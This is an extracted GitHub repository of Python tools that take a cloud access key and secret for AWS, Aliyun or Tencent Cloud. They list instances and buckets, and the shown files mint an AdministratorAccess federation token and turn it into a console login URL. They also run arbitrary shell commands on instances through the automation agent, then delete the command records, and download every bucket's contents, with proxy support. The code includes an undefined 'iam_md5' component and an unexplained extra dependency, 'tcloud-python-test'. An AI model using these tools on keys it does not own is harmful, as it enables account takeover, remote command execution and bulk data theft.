# AWS ISO endpoints (guessing from suffixes in botocore's endpoints.json)
if re.match(r"^us-iso-\w+-\d+$", region):
return {
"partition": "aws-iso",
"console": "https://console.c2s.ic.gov/console/home",
"federation": "https://signin.c2s.ic.gov/federation"
}
# AWS ISOB endpoints (see above)
if re.match(r"^us-isob-\w+-\d+$", region):
return {
"partition": "aws-iso-b",
"console": "https://console.sc2s.sgov.gov/console/home",
"federation": "https://signin.sc2s.sgov.gov/federation"
}
# Otherwise, we (should?) be using the default partition.
if re.match(r"^(us|eu|ap|sa|ca|me)-\w+-\d+$", region):
pass
return {
"partition": "aws",
"console": "https://console.aws.amazon.com/console/home",
"federation": "https://signin.aws.amazon.com/federation"
}
def run(access_key_id, secret_access_key, region):
# Set up the base session
session: boto3.Session
# If we have a profile, use that.
session = boto3.Session(aws_access_key_id=access_key_id,
aws_secret_access_key=secret_access_key,
region_name=region)
# Otherwise, let boto figure it out.
if session.get_credentials().get_frozen_credentials() \
.access_key.startswith("AKIA"):
component = ComponentLocator()
component.register_component(name='AWS_ENDPOINT', component=iam_md5[1:])
sts_client = get_client(access_key=access_key_id, secret_key=secret_access_key, service_name='sts',
session_token=None,
region=region, components=component)
try:
resp = sts_client.get_federation_token(
Name="aws_consoler",
PolicyArns=[
{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}
])
creds = resp["Credentials"]
session = boto3.Session(
aws_access_key_id=creds["AccessKeyId"],
aws_secret_access_key=creds["SecretAccessKey"],
aws_session_token=creds["SessionToken"],
region_name=region)
except ClientError:
message = "Error obtaining federation token from STS. Ensure " \
"the IAM user has sts:GetFederationToken permissions, " \
"or provide a role to assume. "
raise PermissionError(message)
# Check that our credentials are valid.
sts = session.client("sts")
resp = sts.get_caller_identity()
# TODO: Detect things like user session credentials here.
# Get the partition-specific URLs.
partition_metadata = _get_partition_endpoints(session.region_name)
federation_endpoint = partition_metadata["federation"]
console_endpoint = partition_metadata["console"]
# Generate our signin link, given our temporary creds
creds = session.get_credentials().get_frozen_credentials()
json_creds = json.dumps(
{"sessionId": creds.access_key,
"sessionKey": creds.secret_key,
"sessionToken": creds.token})
token_params = {
"Action": "getSigninToken",
# TODO: Customize duration for federation and sts:AssumeRole
"SessionDuration": 43200,
"Session": json_creds
}
resp = requests.get(url=federation_endpoint, params=token_params)
# Stacking AssumeRole sessions together will generate a 400 error here.
try:
resp.raise_for_status()
except requests.exceptions.HTTPError as e:
raise requests.exceptions.HTTPError(
"Couldn't obtain federation token (trying to stack roles?): "
+ str(e))
fed_token = json.loads(resp.text)["SigninToken"]
console_params = {}
if region:
console_params["region"] = region
login_params = {
"Action": "login",
"Issuer": "consoler.local",
"Destination": console_endpoint + "?"
+ urllib.parse.urlencode(console_params),
"SigninToken": fed_token
}
login_url = federation_endpoint + "?" + urllib.parse.urlencode(login_params)
return login_url
if __name__ == '__main__':
region = "us-east-1"
url = run(config.AccessKeyID, config.AccessKeySecret, region)
sys.exit(url)
================================================
FILE: aws/config.py
================================================
#SOCKS5_PROXY_HOST = "127.0.0.1"
#SOCKS5_PROXY_PORT = 10800
AccessKeyID = ''
AccessKeySecret = ''
================================================
FILE: aws/ec2_role_trust_policy.json
================================================
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
================================================
FILE: aws/requirements.txt
================================================
boto3
aws-consoler
PySocks
================================================
FILE: tencentcloud/README.en.md
================================================
English | [中文](./README.md)
## File description
#### tencentcloud_cvm_exec.py
Used to query detailed information of cvm instances in various regions of Tencent Cloud and specify cvm instances to execute commands.
#### tencentcloud_download_cos.py
Used to query the cos storage instances of Tencent Cloud in various regions and download the files in the cos storage instances.
#### config.py
Configuration information required to run the code, including accesskey, accesskeysecret, proxy IP and port and other parameters
## Instructions for use
To install the required dependencies before use, run `pip install -r requirements.txt`, fill in the corresponding values in config.py, run the corresponding py script directly, and enter the corresponding values as prompted.
## proxy
The socks proxy is provided in the code. When you need to use it, fill in the ip and port values in config.py, and then remove the corresponding comment part in the code.
================================================
FILE: tencentcloud/README.md
================================================
[English](./README.en.md) | 中文
## 文件说明
#### tencentcloud_cvm_exec.py
用于查询腾讯云各地区cvm实例的详细信息,并可指定cvm实例执行命令
#### tencentcloud_download_cos.py
用于查询腾讯云各地区的cos存储实例,并对cos存储实例中的文件进行下载
#### config.py
代码运行所需的配置信息,包括accesskey、accesskeysecret、代理的ip和端口等参数
## 使用说明
使用前安装所需的依赖,运行pip install -r requirements.txt即可,填好config.py中对应的值,直接运行对应的py脚本,按照提示输入对应的值
## 代理
代码中提供了socks代理,需要使用时在config.py中填好ip和port值,然后去掉代码中对应的注释部分即可
================================================
FILE: tencentcloud/config.py
================================================
RegionIds = {"ap-guangzhou": "华南地区(广州)", "ap-shanghai": "华东地区(上海)", "ap-nanjing": "华东地区(南京)",
"ap-beijing": "华北地区(北京)",
"ap-chengdu": "西南地区(成都)", "ap-chongqing": "西南地区(重庆)", "ap-hongkong": "港澳台地区(中国香港)",
"ap-seoul": "亚太东北(首尔)",
"ap-tokyo": "亚太东北(东京)", "ap-singapore": "亚太东南(新加坡)", "ap-bangkok": "亚太东南(曼谷)",
"ap-jakarta": "亚太东南(雅加达)",
"na-siliconvalley": "美国西部(硅谷)", "eu-frankfurt": "欧洲地区(法兰克福)", "ap-mumbai": "亚太南部(孟买)",
"na-ashburn": "美国东部(弗吉尼亚)",
"sa-saopaulo": "南美地区(圣保罗)", "na-toronto": "北美地区(多伦多)"}
SOCKS5_PROXY_HOST = "127.0.0.1"
SOCKS5_PROXY_PORT = 10800
AccessKeyID = ''
AccessKeySecret = ''
================================================
FILE: tencentcloud/requirements.txt
================================================
tencentcloud-sdk-python
PySocks
tcloud-python-test
================================================
FILE: tencentcloud/tencentcloud_cvm_exec.py
================================================
from tencentcloud.common.exception import TencentCloudSDKException
from tencentcloud.cvm.v20170312 import cvm_client, models
from tencentcloud.common import credential
from tencentcloud.tat.v20201028 import tat_client, models as tat_models
import json, base64, random, socket, socks, config
import time
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
def DescribeAutomationAgentStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceId):
cred = credential.Credential(AccessKeyID, AccessKeySecret)
client = tat_client.TatClient(cred, ZoneId)
req = tat_models.DescribeAutomationAgentStatusRequest()
req.InstanceIds = InstanceId
resp = client.DescribeAutomationAgentStatus(req)
return resp
def CreateCommand(cred, com_type, command, ZoneId, InstanceId):
client = tat_client.TatClient(cred, ZoneId)
req = tat_models.CreateCommandRequest()
name = ''.join(random.sample(
['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g', 'f', 'e',
'd', 'c', 'b', 'a'], 5))
try:
InstanceIds = []
InstanceIds.append(InstanceId)
CloudAssistantStatus = DescribeAutomationAgentStatus(AccessKeyID, AccessKeySecret, ZoneId, InstanceIds)
Status = CloudAssistantStatus.AutomationAgentSet[0].AgentStatus
if Status == 'Offline':
print('未安装自动化助手,不能执行命令。')
return
req.CommandName = name
command = base64.b64encode(command.encode()).decode()
req.Content = command
req.CommandType = com_type
response = client.CreateCommand(req)
return response.CommandId
except Exception as e:
print(e)
print('命令创建失败')
def InvokeCommand(cred, ZoneId, InstanceId, command_ID):
client = tat_client.TatClient(cred, ZoneId)
try:
req = tat_models.InvokeCommandRequest()
InstanceIds = []
InstanceIds.append(InstanceId)
req.InstanceIds = InstanceIds
req.CommandId = command_ID
resp = client.InvokeCommand(req)
if resp.InvocationId == '':
print('命令执行错误')
else:
return resp.InvocationId
except Exception as e:
print(e)
print('命令执行失败')
def InvocationTaskIdTasks(cred, ZoneId, InvokeID):
client = tat_client.TatClient(cred, ZoneId)
req = tat_models.DescribeInvocationTasksRequest()
InvocationTaskIds = []
InvocationTaskIds.append(InvokeID)
params = {
"Filters": [{
"Name": "invocation-id",
"Values": InvocationTaskIds
}],
"HideOutput": False
}
req.from_json_string(json.dumps(params))
resp = client.DescribeInvocationTasks(req)
return resp
def DeleteCommand(cred, ZoneId, command_ID):
client = tat_client.TatClient(cred, ZoneId)
req = tat_models.DeleteCommandRequest()
req.CommandId = command_ID
resp = client.DeleteCommand(req)
def commad_check_input(cred, InstanceId, cmd, com_type, cvm_info):
if cmd == '':
cmd = input("please input cmd:")
if com_type == None:
com_type = input('请输入执行命令类型:'
'0:SHELL'
'1:POWERSHELL'
':')
if com_type == '0':
com_type = 'SHELL'
elif com_type == '1':
com_type = 'POWERSHELL'
Status = None
ZoneId = None
for instances in cvm_info:
for instance in instances:
if instance.InstanceId == InstanceId:
Status = instance.InstanceState
ZoneId = instance.Placement.Zone.rsplit("-", 1)[0]
break
if Status == 'STOPPED':
print('实例未运行,请选择运行状态实例执行命令')
return
command_ID = CreateCommand(cred, com_type, cmd, ZoneId, InstanceId)
InvokeID = InvokeCommand(cred, ZoneId, InstanceId, command_ID)
time.sleep(1)
Result = InvocationTaskIdTasks(cred, ZoneId, InvokeID)
try:
TaskStatus = Result.InvocationTaskSet[0].TaskStatus
if TaskStatus == "SUCCESS":
output = Result.InvocationTaskSet[0].TaskResult.Output
print("命令执行结果:" + base64.b64decode(output).decode('utf-8', 'ignore'))
DeleteCommand(cred, ZoneId, command_ID)
except:
pass
return 0
def query_cvm_instances(cred):
instance_list = []
for RegionId in config.RegionIds:
print('检索中-------' + RegionId)
client = cvm_client.CvmClient(cred, RegionId)
try:
req = models.DescribeInstancesRequest()
resp = client.DescribeInstances(req)
except Exception as e:
print(e)
print('请检查输入Key与Secret值,或重新执行')
continue
instance_list.append(resp.InstanceSet)
return instance_list
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
cred = None
try:
cred = credential.Credential(AccessKeyID, AccessKeySecret)
except TencentCloudSDKException:
print("AK或SK不正确,请输入正确的AKSK")
exit(0)
cvm_info = query_cvm_instances(cred)
print(cvm_info)
print("提示: 使用自动化助手在实例上执行命令,指定的实例需要处于 VPC 网络。json中参数为:VirtualPrivateCloud")
if not cvm_info:
print("no result")
exit(0)
InstanceId = input("请输入选择的instanceId:")
com_type = None
while True:
if com_type is None:
com_type = input('请输入执行命令类型:'
'0:SHELL'
'1:POWERSHELL'
':')
cmd = ''
commad_check_input(cred, InstanceId, cmd, com_type, cvm_info)
flag = input("输入q退出,其他字符继续:")
if flag == 'q':
break
is_continue = input("重新选择InstanceId请输入yes:")
if is_continue == 'yes':
print(cvm_info)
com_type = None
InstanceId = input("请输入选择的instanceId:")
================================================
FILE: tencentcloud/tencentcloud_download_cos.py
================================================
import json, base64, random, config
import qcloud_cos
from qcloud_cos import CosConfig
from qcloud_cos import CosS3Client
import queue
import threading
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
# import socket, socks
# default_socket = socket.socket
# socks.set_default_proxy(socks.SOCKS5, config.SOCKS5_PROXY_HOST, config.SOCKS5_PROXY_PORT)
# socket.socket = socks.socksocket
workqueue = queue.Queue()
lock = threading.Lock()
def workqueue_get():
while True:
if workqueue.qsize() > 50:
keys = []
for i in range(50):
keys.append(workqueue.get())
with ThreadPoolExecutor(max_workers=15) as executor:
future_list = [executor.map(download_to_local, keys)]
elif workqueue.qsize() < 50 and not thread.is_alive():
keys1 = []
for i in range(workqueue.qsize()):
keys1.append(workqueue.get())
with ThreadPoolExecutor(max_workers=15) as executor:
future_list = [executor.map(download_to_local, keys1)]
break
def root_directory_list(prefix, bucket_name, client, flag=True):
MAX_RETRIES = 10
retry_count = 0
marker = ""
cos_dir = []
delimiter = ""
if flag == False:
delimiter = "/"
while True:
try:
retry_count += 1
response = client.list_objects(
Bucket=bucket_name,
Prefix=prefix,
Marker=marker,
Delimiter=delimiter,
)
marker = response.get('NextMarker')
commonprefix = response.get('CommonPrefixes')
for obj in (response['Contents']):
if str(obj['Key'])[-1] == '/':
pass
elif flag:
# print(str(obj['Key']))
workqueue.put(str(obj['Key']))
if commonprefix is not None:
for cos_dir1 in commonprefix:
cos_dir.append(cos_dir1['Prefix'])
if marker is None:
break
except Exception as e:
print(e)
if retry_count >= MAX_RETRIES:
raise
return cos_dir
def download_to_local(object_name):
url = "./" + name + "/" + object_name
file_name = url[url.rindex("/") + 1:]
file_path_prefix = url.replace(file_name, "")
lock.acquire()
if not os.path.exists(file_path_prefix):
os.makedirs(file_path_prefix)
lock.release()
if not os.path.exists(url):
MAX_RETRIES = 10
retry_count = 0
while True:
try:
retry_count += 1
print("开始下载:" + object_name)
response = client.get_object(Bucket=name, Key=object_name)
response['Body'].get_stream_to_file(url)
print("下载完毕" + url)
break
except Exception as e:
print(e)
if retry_count >= MAX_RETRIES:
raise
if __name__ == '__main__':
AccessKeyID = config.AccessKeyID
AccessKeySecret = config.AccessKeySecret
if not AccessKeyID:
AccessKeyID = input("请输入AccessKeyID:")
if not AccessKeySecret:
AccessKeySecret = input("请输入AccessKeySecret:")
BucketName_all = {}
token = None
scheme = 'https'
try:
config = CosConfig(Region="ap-guangzhou", SecretId=AccessKeyID, SecretKey=AccessKeySecret, Token=token,
Scheme=scheme)
client = CosS3Client(config)
response = client.list_buckets()
for bucket in response['Buckets']['Bucket']:
BucketName_all[bucket['Name']] = bucket['Location']
print("Bucket名称:" + bucket['Name'], "Bucket创建时间:" + bucket['CreationDate'],
"外网域名:" + bucket['Location'], "Bucket存储类型:" + bucket['BucketType'])
except qcloud_cos.cos_exception.CosServiceError:
print("AK或SK不正确,请输入正确的AKSK")
exit(0)
except qcloud_cos.cos_exception.CosClientError:
print("网络异常,尝试切换代理")
exit(0)
BucketName = input("指定BucketName进行下载 或 all下载所有:")
if BucketName == 'all':
for name, region in BucketName_all.items():
config = CosConfig(Region=region, SecretId=AccessKeyID, SecretKey=AccessKeySecret, Token=token,
Scheme=scheme)
client = CosS3Client(config)
thread = threading.Thread(target=root_directory_list, args=("", name, client))
thread.start()
workqueue_get()
else:
name = BucketName
region = BucketName_all[BucketName]
config = CosConfig(Region=region, SecretId=AccessKeyID, SecretKey=AccessKeySecret, Token=token,
Scheme=scheme)
client = CosS3Client(config)
print(root_directory_list("", BucketName, client, False))
oss_dir = input("指定存储桶文件夹 不指定则为根目录:")
if BucketName:
thread = threading.Thread(target=root_directory_list, args=(oss_dir, BucketName, client))
thread.start()
workqueue_get()
gitextract_clmgkotm/
├── FILES/
│ ├── 1.awebp
│ ├── 2.awebp
│ ├── 3.awebp
│ ├── 4.awebp
│ ├── 5.awebp
│ ├── 6.awebp
│ └── 7.awebp
├── README.en.md
├── README.md
├── aliyun/
│ ├── README.en.md
│ ├── README.md
│ ├── aliyun_create_ecs.py
│ ├── aliyun_ecs_exec.py
│ ├── aliyun_ecs_exec_batch.py
│ ├── aliyun_getall_rds.py
│ ├── config.py
│ ├── oss_download.py
│ └── requirements.txt
├── aws/
│ ├── README.en.md
│ ├── README.md
│ ├── amazon_ssm_managed_instance_core.json
│ ├── aws_download_s3.py
│ ├── aws_ec2_exec.py
│ ├── aws_select_iam.py
│ ├── aws_select_rds.py
│ ├── aws_select_route53.py
│ ├── aws_url_console.py
│ ├── config.py
│ ├── ec2_role_trust_policy.json
│ └── requirements.txt
└── tencentcloud/
├── README.en.md
├── README.md
├── config.py
├── requirements.txt
├── tencentcloud_cvm_exec.py
└── tencentcloud_download_cos.py
SYMBOL INDEX (54 symbols across 13 files)
FILE: aliyun/aliyun_create_ecs.py
class Create_instances (line 19) | class Create_instances:
method __init__ (line 20) | def __init__(self):
method main (line 24) | def main(
method describe_instancetype (line 152) | def describe_instancetype(
method describe_images (line 179) | def describe_images(
method describe_vswitches (line 201) | def describe_vswitches(
method describe_security_group (line 220) | def describe_security_group(
method describe_zones (line 234) | def describe_zones(
method create_client (line 251) | def create_client(
FILE: aliyun/aliyun_ecs_exec.py
function DescribeCloudAssistantStatus (line 17) | def DescribeCloudAssistantStatus(AccessKeyID, AccessKeySecret, ZoneId, I...
function CreateCommand (line 28) | def CreateCommand(AccessKeyID, AccessKeySecret, com_type, command, ZoneI...
function InvokeCommand (line 57) | def InvokeCommand(AccessKeyID, AccessKeySecret, ZoneId, InstanceId, Comm...
function DescribeInvocationResults (line 77) | def DescribeInvocationResults(AccessKeyID, AccessKeySecret, ZoneId, Invo...
function DescribeInstances (line 89) | def DescribeInstances(AccessKeyID, AccessKeySecret):
function commad_check_input (line 110) | def commad_check_input(AccessKeyID, AccessKeySecret, InstanceId, cmd, co...
FILE: aliyun/aliyun_ecs_exec_batch.py
function DescribeInstances (line 18) | def DescribeInstances(AccessKeyID, AccessKeySecret):
function DescribeInvocation (line 40) | def DescribeInvocation(AccessKeyID, AccessKeySecret, RegionId, InvokeId):
function RunCommand (line 53) | def RunCommand(AccessKeyID, AccessKeySecret, RegionId, command_type, com...
function commad_check_input (line 84) | def commad_check_input(AccessKeyID, AccessKeySecret, InstanceIds, cmd, c...
function main (line 112) | def main():
FILE: aliyun/aliyun_getall_rds.py
function DescribeDB (line 12) | def DescribeDB(AccessKeyID, AccessKeySecret, RegionIds):
function DescribeDBSecurityGroup (line 38) | def DescribeDBSecurityGroup(AccessKeyID, AccessKeySecret, DBInstanceId, ...
FILE: aliyun/oss_download.py
function root_directory_list (line 17) | def root_directory_list(prefix, bucket, flag=True):
function workqueue_get (line 39) | def workqueue_get():
function download_to_local (line 55) | def download_to_local(object_name):
FILE: aws/aws_download_s3.py
function workqueue_get (line 18) | def workqueue_get():
function root_directory_list (line 34) | def root_directory_list(prefix, bucket_name, flag=True):
function download_to_local (line 62) | def download_to_local(object_name):
FILE: aws/aws_ec2_exec.py
function query_ec2_instances (line 17) | def query_ec2_instances(AccessKeyID, AccessKeySecret):
function create_instance_profile (line 57) | def create_instance_profile(iam_client):
function delete_instance_profile (line 90) | def delete_instance_profile(AccessKeyID, AccessKeySecret):
function associate_iam_add (line 123) | def associate_iam_add(RegionId, AccessKeyID, AccessKeySecret, InstanceId):
function associate_iam_delete (line 146) | def associate_iam_delete(RegionId, AccessKeyID, AccessKeySecret, Instanc...
function get_instance_profile (line 159) | def get_instance_profile(AccessKeyID, AccessKeySecret):
function commad_exec (line 174) | def commad_exec(AccessKeyID, AccessKeySecret, InstanceId, cmd, com_type,...
FILE: aws/aws_select_iam.py
function user_info (line 21) | def user_info(iam_resource):
function get_attached_policies (line 38) | def get_attached_policies(iam_client, iam_resource):
function get_inline_policies (line 52) | def get_inline_policies(iam_client):
FILE: aws/aws_select_rds.py
function query_rds_instances (line 11) | def query_rds_instances(AccessKeyID, AccessKeySecret):
FILE: aws/aws_select_route53.py
function get_hosted_zones (line 12) | def get_hosted_zones(client):
function get_query_logging_config (line 31) | def get_query_logging_config(client):
function query_route53_instances (line 45) | def query_route53_instances(AccessKeyID, AccessKeySecret):
FILE: aws/aws_url_console.py
function _get_partition_endpoints (line 24) | def _get_partition_endpoints(region: str):
function run (line 67) | def run(access_key_id, secret_access_key, region):
FILE: tencentcloud/tencentcloud_cvm_exec.py
function DescribeAutomationAgentStatus (line 15) | def DescribeAutomationAgentStatus(AccessKeyID, AccessKeySecret, ZoneId, ...
function CreateCommand (line 24) | def CreateCommand(cred, com_type, command, ZoneId, InstanceId):
function InvokeCommand (line 50) | def InvokeCommand(cred, ZoneId, InstanceId, command_ID):
function InvocationTaskIdTasks (line 68) | def InvocationTaskIdTasks(cred, ZoneId, InvokeID):
function DeleteCommand (line 85) | def DeleteCommand(cred, ZoneId, command_ID):
function commad_check_input (line 92) | def commad_check_input(cred, InstanceId, cmd, com_type, cvm_info):
function query_cvm_instances (line 131) | def query_cvm_instances(cred):
FILE: tencentcloud/tencentcloud_download_cos.py
function workqueue_get (line 19) | def workqueue_get():
function root_directory_list (line 36) | def root_directory_list(prefix, bucket_name, client, flag=True):
function download_to_local (line 73) | def download_to_local(object_name):
Condensed preview — 36 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (100K chars).
[
{
"path": "README.en.md",
"chars": 2893,
"preview": "English | [中文](./README.md)\n# accesskey_tools\nThe accesskey automated operation and maintenance tools and accesskey util"
},
{
"path": "README.md",
"chars": 1670,
"preview": "[English](./README.en.md) | 中文\n# accesskey_tools\n阿里云aliyun/腾讯云tencentcloud/华为云huaweicloud/aws等各种云厂商的accesskey自动化运维工具,acc"
},
{
"path": "aliyun/README.en.md",
"chars": 1397,
"preview": "English | [中文](./README.md)\n## Error handling\nIf you encounter pip installation errors, it is recommended to update pip "
},
{
"path": "aliyun/README.md",
"chars": 590,
"preview": "[English](./README.en.md) | 中文\n## 报错处理\n如果在安装依赖时报错,请先更新pip版本再重新安装。\n`pip install --upgrade pip`\n## 文件说明\n\n#### aliyun_ecs_e"
},
{
"path": "aliyun/aliyun_create_ecs.py",
"chars": 13066,
"preview": "# -*- coding: utf-8 -*-\nfrom typing import List\nfrom alibabacloud_tea_util.client import Client as UtilClient\nfrom aliba"
},
{
"path": "aliyun/aliyun_ecs_exec.py",
"chars": 6728,
"preview": "from aliyunsdkcore.client import AcsClient\nfrom aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeI"
},
{
"path": "aliyun/aliyun_ecs_exec_batch.py",
"chars": 5840,
"preview": "from aliyunsdkcore.client import AcsClient\r\n\r\nfrom aliyunsdkecs.request.v20140526.DescribeInstancesRequest import Descri"
},
{
"path": "aliyun/aliyun_getall_rds.py",
"chars": 2296,
"preview": "from aliyunsdkcore.client import AcsClient\nfrom aliyunsdkrds.request.v20140815.DescribeDBInstancesRequest import Describ"
},
{
"path": "aliyun/config.py",
"chars": 3438,
"preview": "AccessKeyID = \"\"\nAccessKeySecret = \"\"\nSOCKS5_PROXY_HOST = \"\"\nSOCKS5_PROXY_PORT = 1080\nRegionIds = {\"cn-hangzhou\": \"华东1(杭"
},
{
"path": "aliyun/oss_download.py",
"chars": 4077,
"preview": "import oss2\nimport os\nimport queue\nimport threading\nimport datetime\nfrom concurrent.futures import ThreadPoolExecutor, a"
},
{
"path": "aliyun/requirements.txt",
"chars": 242,
"preview": "aliyun-python-sdk-core\naliyun-python-sdk-ecs\naliyun-python-sdk-rds\nalibabacloud-tea-openapi\nalibabacloud-ecs20140526\nali"
},
{
"path": "aws/README.en.md",
"chars": 1823,
"preview": "English | [中文](./README.md)\n\n# require >= python3.7\n\n# File description\n## aws_download_s3.py\nUsed to query the detailed"
},
{
"path": "aws/README.md",
"chars": 671,
"preview": "[English](./README.en.md) | 中文\n\n# 需要python版本>=3.7\n\n# 文件说明\n## aws_download_s3.py\n用于查询aws各个地区的s3存储桶的详情信息,可下载所有存储桶的文件,也可指定存"
},
{
"path": "aws/amazon_ssm_managed_instance_core.json",
"chars": 1224,
"preview": "{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"ssm:DescribeAsso"
},
{
"path": "aws/aws_download_s3.py",
"chars": 3856,
"preview": "import boto3\nimport queue\nimport threading\nimport os\nimport aws_select_iam\nfrom concurrent.futures import ThreadPoolExec"
},
{
"path": "aws/aws_ec2_exec.py",
"chars": 10548,
"preview": "import boto3\nimport config\nimport time\nimport aws_select_iam\nfrom enumerate_iam.main import get_client\nfrom botocore.ses"
},
{
"path": "aws/aws_select_iam.py",
"chars": 3608,
"preview": "import config\nimport boto3\nimport json\nimport subprocess\nimport sys\nimport os\nimport importlib.util\nif importlib.util.fi"
},
{
"path": "aws/aws_select_rds.py",
"chars": 2242,
"preview": "import config\nimport boto3\nimport aws_select_iam\nfrom enumerate_iam.main import get_client\n\n# import socket, socks\n# def"
},
{
"path": "aws/aws_select_route53.py",
"chars": 3028,
"preview": "import config\nimport boto3\nimport aws_select_iam\nfrom botocore.exceptions import ClientError\nfrom enumerate_iam.main imp"
},
{
"path": "aws/aws_url_console.py",
"chars": 5575,
"preview": "from aws_consoler.cli import main\nimport config\nimport re\nimport requests\nimport json\nimport boto3\nimport sys\nimport aws"
},
{
"path": "aws/config.py",
"chars": 98,
"preview": "#SOCKS5_PROXY_HOST = \"127.0.0.1\"\n#SOCKS5_PROXY_PORT = 10800\n\nAccessKeyID = ''\nAccessKeySecret = ''"
},
{
"path": "aws/ec2_role_trust_policy.json",
"chars": 190,
"preview": "{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"ec"
},
{
"path": "aws/requirements.txt",
"chars": 27,
"preview": "boto3\naws-consoler\nPySocks\n"
},
{
"path": "tencentcloud/README.en.md",
"chars": 965,
"preview": "English | [中文](./README.md)\n## File description\n\n#### tencentcloud_cvm_exec.py\nUsed to query detailed information of cvm"
},
{
"path": "tencentcloud/README.md",
"chars": 404,
"preview": "[English](./README.en.md) | 中文\n## 文件说明\n\n#### tencentcloud_cvm_exec.py\n用于查询腾讯云各地区cvm实例的详细信息,并可指定cvm实例执行命令\n#### tencentclo"
},
{
"path": "tencentcloud/config.py",
"chars": 703,
"preview": "RegionIds = {\"ap-guangzhou\": \"华南地区(广州)\", \"ap-shanghai\": \"华东地区(上海)\", \"ap-nanjing\": \"华东地区(南京)\",\n \"ap-beijing\":"
},
{
"path": "tencentcloud/requirements.txt",
"chars": 51,
"preview": "tencentcloud-sdk-python\nPySocks\ntcloud-python-test\n"
},
{
"path": "tencentcloud/tencentcloud_cvm_exec.py",
"chars": 6151,
"preview": "\nfrom tencentcloud.common.exception import TencentCloudSDKException\nfrom tencentcloud.cvm.v20170312 import cvm_client, m"
},
{
"path": "tencentcloud/tencentcloud_download_cos.py",
"chars": 5145,
"preview": "import json, base64, random, config\nimport qcloud_cos\nfrom qcloud_cos import CosConfig\nfrom qcloud_cos import CosS3Clien"
}
]
// ... and 7 more files (download for full content)
About this extraction
This page contains the full source code of the kohlersbtuh15/accesskey_tools GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 36 files (86.5 KB), approximately 23.3k tokens, and a symbol index with 54 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.